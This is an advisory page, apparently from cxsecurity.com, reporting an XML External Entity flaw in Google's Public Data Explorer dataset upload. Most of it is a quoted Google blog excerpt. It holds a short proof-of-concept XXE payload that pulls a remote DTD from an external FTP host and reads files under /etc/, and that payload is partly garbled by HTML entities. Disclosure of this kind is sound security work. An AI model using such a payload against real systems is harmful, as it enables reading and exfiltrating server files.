Google (Public Data) XML External Entity Vulnerability

2014.02.22
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Background &#8211; Extracted from http://googleblog.blogspot.com/2011/02/visualize your own data in google.html Over the past two years, we&#8217;ve made public data easier to find, explore and understand in several ways, providing unemployment figures, population statistics and world development indicators in search Google (Public Data) XML External Entity Vulnerability results, and introducing the Public Data Explorer tool. Together with our data provider partners, we&#8217;ve curated 27 datasets including more than 300 data metrics. You can now use the Public Data Explorer to visualize everything from labor productivity (OECD) to Internet speed (Ookla) to gender balance in parliaments (UNECE) to government debt levels (IMF) to population density by municipality (Statistics Catalonia), with more data being added every week. Today, we&#8217;re opening the Public Data Explorer to your data. We&#8217;re making a new data format, the Dataset Publishing Language (DSPL), openly available, and providing an interface for anyone to upload their datasets. DSPL is an XML based format designed from the ground up to support rich, interactive visualizations like those in the Public Data Explorer. The DSPL language and upload interface are available in Google Labs PoC: <!DOCTYPE root [ <!ENTITY % remote SYSTEM "ftp://foo:bar@192.163.249.65/xxe.txt"> %remote; %param1; ]> <!ENTITY % payload SYSTEM "file:///etc/&#8221;> <!ENTITY % param1 '<!ENTITY &#37; internal SYSTEM "%payload;" >' > %param1; %internal More: http://www.securatary.com/Portals/0/Vulnerabilities/Google/Google%20XXE%20Attack.pdf

References:

http://www.securatary.com/Portals/0/Vulnerabilities/Google/Google%20XXE%20Attack.pdf
http://googleblog.blogspot.com/2011/02/visualize


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top